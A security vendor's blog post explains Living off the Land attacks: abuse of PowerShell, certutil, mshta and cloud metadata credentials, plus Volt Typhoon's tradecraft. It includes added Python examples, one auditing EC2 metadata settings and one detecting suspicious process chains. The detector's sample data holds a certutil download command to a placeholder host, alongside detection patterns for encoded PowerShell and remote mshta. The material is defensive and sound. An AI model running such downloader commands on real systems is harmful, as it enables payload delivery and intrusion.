Living off the Land Attacks (LotL): When Hackers Use Your Tools Against You
Shilpi Mondal | Date: January 09, 2026
We used to worry about "files."
In the old days (and by that I mean just a few years ago), defense was largely about spotting the anomaly on the disk: a strange .exe, a malicious payload, a signature that didn't match the known good. But the game has changed entirely. Why would an attacker spend time and money developing custom malware that might get flagged by your antivirus when they can simply use the tools you've already paid for, installed, and trusted?
This is the reality of Living off the Land (LotL). It’s not just a trend; it’s the dominant tradecraft of modern intrusions. In fact, recent analysis suggests that 84% of high-severity cyberattacks now leverage legitimate system tools, marking a complete departure from the malware-heavy intrusions we spent the last decade fighting.
For IT leaders and CIOs, this is the wake-up call: The absence of a malicious file is no longer an indicator of safety.
The "Fileless" Shift: Why Foraging Beats Coding

At its core, LotL is about "foraging." Attackers gain access to your environment and, instead of bringing their own weapons, they pick up yours. They operate primarily in system memory (RAM), avoiding the disk entirely to evade traditional scanning. Think of it from the attacker's ROI perspective. Developing a zero-day exploit is expensive. Using powershell.exe, which is already whitelisted on every machine in your fleet, is free. As noted by CrowdStrike, this technique allows threat actors to blend seamlessly with legitimate administrative tasks, making their activity nearly indistinguishable from a sysadmin running a routine update. The mechanism is terrifyingly simple. In a traditional attack, your security stack looks for "known bad." In an LotL scenario, the executable is a signed, trusted component. The malicious intent isn't in the binary; it resides in the command passed to it.
The Windows Arsenal: LOLBins in Action
Windows is the primary theater for these operations because it is packed with powerful administrative utilities, which we call LOLBins (Living Off The Land Binaries).
Take PowerShell, for instance. It is the "Swiss Army Knife" of these attacks. Because of its deep integration with the .NET framework and Windows API, it allows attackers to perform complex tasks like credential dumping and data exfiltration entirely in memory. It’s no surprise that PowerShell appears in approximately 71% of all documented LotL attacks, according to Vectra AI.
But it’s not just PowerShell. We see attackers getting creative with mundane utilities:
Certutil.exe:
Nominally used for certificate management, it’s a favorite for stealthy payload delivery. Attackers use it to download files via the -urlcache flag, bypassing standard browser controls.
Mshta.exe:
We've seen this used to execute malicious JavaScript or VBScript by passing a URL directly to the binary.
Rundll32.exe:
Perhaps the most famous LOLBin, it loads and runs functions within DLL files, frequently executing payloads disguised as standard libraries.
The LOLBAS project documents these abuses extensively, highlighting just how many Microsoft-signed components can be repurposed. If you aren't monitoring how these specific binaries are being invoked, you're flying blind.
Beyond the Desktop: Living Off the Cloud (LotC)

Here is where the threat landscape gets even stickier. As we've migrated our infrastructure to AWS, Azure, and GCP, the attackers have followed. They are now "Living off the Cloud" (LotC). Out here, hackers twist built-in cloud controls and data feeds to their advantage. A single compromised server can query Amazon's instance metadata service and harvest short-lived access credentials on the fly. Those credentials open paths straight into storage buckets or database engines, with no need to brute-force a single password.
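The metadata-service abuse described above has a direct configuration mitigation: requiring the session-token (IMDSv2) flow and keeping the PUT response hop limit at 1, so that a plain GET from a compromised process or a forwarded request from a container cannot fetch role credentials. The audit below is an added example, not code from the article or from AWS; it runs over a constructed document shaped like the `Reservations[].Instances[].MetadataOptions` section of `aws ec2 describe-instances` output (the instance IDs, ARN and account number are made up).

```python
"""Audit EC2 instance metadata settings for exposure to credential theft.

Added example. The input below is constructed to mirror the shape of
`aws ec2 describe-instances --output json`; every identifier in it is fake.
"""
import json
from typing import Dict, List

SAMPLE_DESCRIBE_INSTANCES = json.dumps({
    "Reservations": [{"Instances": [
        {   # constructed: IMDSv1 still allowed, reachable from containers, role attached
            "InstanceId": "i-0000000000000aaaa",
            "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional",
                                "HttpPutResponseHopLimit": 2},
            "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/web-role"},
        },
        {   # constructed: hardened instance, IMDSv2 only, hop limit 1
            "InstanceId": "i-0000000000000bbbb",
            "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                                "HttpPutResponseHopLimit": 1},
            "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/db-role"},
        },
        {   # constructed: metadata endpoint switched off entirely
            "InstanceId": "i-0000000000000cccc",
            "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional",
                                "HttpPutResponseHopLimit": 1},
        },
    ]}]
})


def audit_metadata_options(describe_json: str) -> Dict[str, List[str]]:
    """Map each instance ID to the list of metadata-service weaknesses found."""
    findings: Dict[str, List[str]] = {}
    for reservation in json.loads(describe_json)["Reservations"]:
        for inst in reservation["Instances"]:
            iid = inst["InstanceId"]
            opts = inst.get("MetadataOptions", {})
            issues: List[str] = []
            if opts.get("HttpEndpoint") == "disabled":
                findings[iid] = issues      # nothing to steal from a disabled endpoint
                continue
            if opts.get("HttpTokens") != "required":
                issues.append("IMDSv1 allowed (HttpTokens != required): an unauthenticated "
                              "GET from any local process or SSRF can read role credentials")
            hops = opts.get("HttpPutResponseHopLimit", 1)
            if hops > 1:
                issues.append(f"hop limit {hops} > 1: containers or forwarded requests "
                              "on the host can complete the IMDSv2 token exchange")
            if issues and "IamInstanceProfile" in inst:
                issues.append("an IAM role is attached, so the exposed credentials are real")
            findings[iid] = issues
    return findings


def noncompliant_instances(findings: Dict[str, List[str]]) -> List[str]:
    """Sorted IDs of instances with at least one finding."""
    return sorted(iid for iid, issues in findings.items() if issues)


if __name__ == "__main__":
    report = audit_metadata_options(SAMPLE_DESCRIBE_INSTANCES)
    for iid in noncompliant_instances(report):
        print(iid)
        for issue in report[iid]:
            print("  -", issue)
```

Feed it the real output of `aws ec2 describe-instances --output json` and every instance it names is one where a foothold on the box (or an SSRF bug in an app on it) is enough to walk off with the attached role's credentials; the fix on those is `aws ec2 modify-instance-metadata-options --http-tokens required --http-put-response-hop-limit 1`.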
We are also seeing a rise in what I call "identity-based" LotL. The SolarWinds breach was a masterclass in this. While the initial entry was a poisoned update, the persistence mechanism was the "Golden SAML" technique. As CyberArk explains, this allowed attackers to forge SAML tokens and impersonate any identity in the organization. It was a "fileless" identity attack that left no trace on the endpoint, effectively allowing them to hide in plain sight within the federation stack.
The Stealth of Volt Typhoon: A Warning for Critical Infrastructure
If you need a concrete example of the stakes, look no further than Volt Typhoon. This PRC-sponsored campaign didn't just use LotL techniques; they lived them.
Their hallmark was operational security so tight that, in some cases, they maintained access to victim environments for at least five years before discovery. Custom malware barely appeared at all. Built-in Windows tools did most of the work: commands such as net user, ping, and systeminfo mapped out network layouts, and vssadmin created volume shadow copies from which credentials could be extracted.
Oddly enough, their traffic traveled through hacked home routers, so each connection appeared to come from an ordinary residential device. As the CISA and FBI joint advisory detailed, this is the future of state-sponsored tradecraft: low-and-slow, using your own infrastructure to persist indefinitely.
Strategies for Defense: Stripping the Land
So, how do we defend against tools we need to do our jobs? We can't just delete PowerShell. The answer lies in moving away from simple allow-listing and toward behavioral baselining. We have to stop trusting the tool and start scrutinizing the usage.
Enable Script Block Logging:
You cannot detect what you cannot see. Standard logging often misses the context of a PowerShell script. Enabling PowerShell Script Block Logging (Event ID 4104) is non-negotiable. It records the script block at the moment it executes, after de-obfuscation, so tricks like Base64 encoding no longer hide the content. Seeing what someone meant to do matters more than just catching the act itself.
Tune Your EDR for Behavior:
Your EDR needs to be tuned to your specific environment. It should flag unusual parent-child process relationships. For instance, MicrosoftTeams.exe should generally not be spawning cmd.exe. Kaspersky suggests establishing strict baselines for administrative activity and setting alerts for deviations. If an admin account uses certutil from a non-standard workstation at 2 AM, that’s an incident.
Reduce the Surface Area:
Finally, practice aggressive application control. If a specific department doesn't need `bitsadmin.exe`, block it using AppLocker or Windows Defender Application Control (WDAC). As DeepStrike points out, effective prevention requires limiting the availability of these powerful tools to only those who strictly require them.
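The three defensive steps above, and the LOLBin list earlier in the post, come down to one question: does this invocation of a trusted binary match how it is normally used here? The script below is an added example (not the author's code or any vendor's product) of that logic run over constructed process-creation events in the shape an EDR or Sysmon Event ID 1 would give you. The baseline (which workstations and hours count as "admin") and every host, user and path in the sample events are assumptions made up for the example; the one thing taken straight from PowerShell's behaviour is that `-EncodedCommand` carries UTF-16LE text in Base64.

```python
"""Flag Living-off-the-Land patterns in process-creation telemetry.

Added example. Events and baseline values are constructed, not taken from
any real environment or from the article.
"""
import base64
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    user: str
    parent: str      # parent image path
    image: str       # image path of the new process
    cmdline: str


# Constructed baseline: user-facing apps should never spawn a shell or script host.
USER_APPS = {"teams.exe", "outlook.exe", "winword.exe", "excel.exe", "msedge.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Constructed baseline: admin utilities are expected only from these hosts and hours.
ADMIN_WORKSTATIONS = {"adm-jump01", "adm-jump02"}
BUSINESS_HOURS = range(7, 20)            # 07:00-19:59 local time
ADMIN_TOOLS = {"certutil.exe", "vssadmin.exe", "bitsadmin.exe"}

# PowerShell -EncodedCommand (also -ec / -enc) takes Base64 of UTF-16LE text.
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(ev: ProcEvent) -> List[str]:
    """Return human-readable findings for one process-creation event."""
    findings: List[str] = []
    img, parent, cl = basename(ev.image), basename(ev.parent), ev.cmdline.lower()

    if parent in USER_APPS and img in SHELLS:
        findings.append(f"suspicious parent-child chain: {parent} -> {img}")
    if img == "certutil.exe" and "-urlcache" in cl:
        findings.append("certutil used as a downloader (-urlcache)")
    if img == "mshta.exe" and re.search(r"https?://", cl):
        findings.append("mshta launched with a remote URL")
    if img in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(ev.cmdline)
        if decoded is not None:
            findings.append(f"encoded PowerShell command, decodes to: {decoded.strip()}")
    if img in ADMIN_TOOLS and (ev.host not in ADMIN_WORKSTATIONS
                               or ev.ts.hour not in BUSINESS_HOURS):
        findings.append(f"{img} run by {ev.user} from {ev.host} at {ev.ts:%H:%M}, outside baseline")
    return findings


# Constructed sample: the encoded payload is just "Get-Process", built here rather than typed.
ENCODED_SAMPLE = base64.b64encode("Get-Process".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcEvent(datetime(2026, 1, 9, 2, 14), "hr-laptop-17", "CORP\\jdoe",
              r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"),
    ProcEvent(datetime(2026, 1, 9, 10, 5), "fin-desk-03", "CORP\\asmith",
              r"C:\Users\asmith\AppData\Local\Microsoft\Teams\current\Teams.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent(datetime(2026, 1, 9, 11, 30), "adm-jump01", "CORP\\ops-admin",
              r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\vssadmin.exe",
              "vssadmin list shadows"),
    ProcEvent(datetime(2026, 1, 9, 14, 2), "mkt-desk-09", "CORP\\bjones",
              r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -NoProfile -EncodedCommand {ENCODED_SAMPLE}"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for finding in analyze(ev):
            print(f"{ev.ts:%Y-%m-%d %H:%M} {ev.host} {ev.user}: {finding}")
```

Note that the third event, vssadmin on an admin jump host during business hours, produces no finding: the same command from an HR laptop at 2 AM would. That is the whole point of baselining over allow-listing, and it is the same reason the first event fires twice (the downloader flag and the out-of-baseline host). In production the decoded `-EncodedCommand` text should be compared against what Event ID 4104 recorded, since Script Block Logging sees the script after every layer of obfuscation, not just the first one.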
Conclusion
Living off the Land attacks represent a fundamental shift in the attacker's mindset. They have realized that the best camouflage is the environment itself. By weaponizing the very tools we use to manage and secure our enterprises, they have eroded the safety net of traditional, file-based security.
But this isn't a lost cause. It just requires a pivot in how we think about trust. We must treat our administrative tools with the same level of scrutiny we apply to external traffic. We need high-fidelity logging, smarter behavioral analytics, and the courage to restrict convenience for the sake of security.
At IronQlad, we help organizations harden their environments against these exact types of advanced threats. If you're unsure whether your current logging strategy can detect a "fileless" intrusion, it might be time for a deeper conversation.
KEY TAKEAWAYS:
The Paradigm Has Shifted: Roughly 84 percent of high-severity attacks now use the system's own tools instead of custom malware, so looking for malicious software alone is no longer enough to stop them.
PowerShell Is the Priority: Because it appears in more than 70% of LotL attacks, PowerShell execution must be watched closely, and Script Block Logging is how you see what actually ran.
The Cloud Is the New Frontier: Attackers are now Living off the Cloud (LotC), abusing instance metadata services and identity federation systems such as SAML to stay hidden without leaving any files behind.
Behavior Over Signatures: Real defense means understanding what normal administrative activity looks like in your environment and flagging deviations, such as unusual parent-child process chains, before they cause damage.
Hardening is Essential: Reducing the attack surface by blocking unnecessary binaries (AppLocker/WDAC) and restricting administrative privileges is the most effective preventative measure.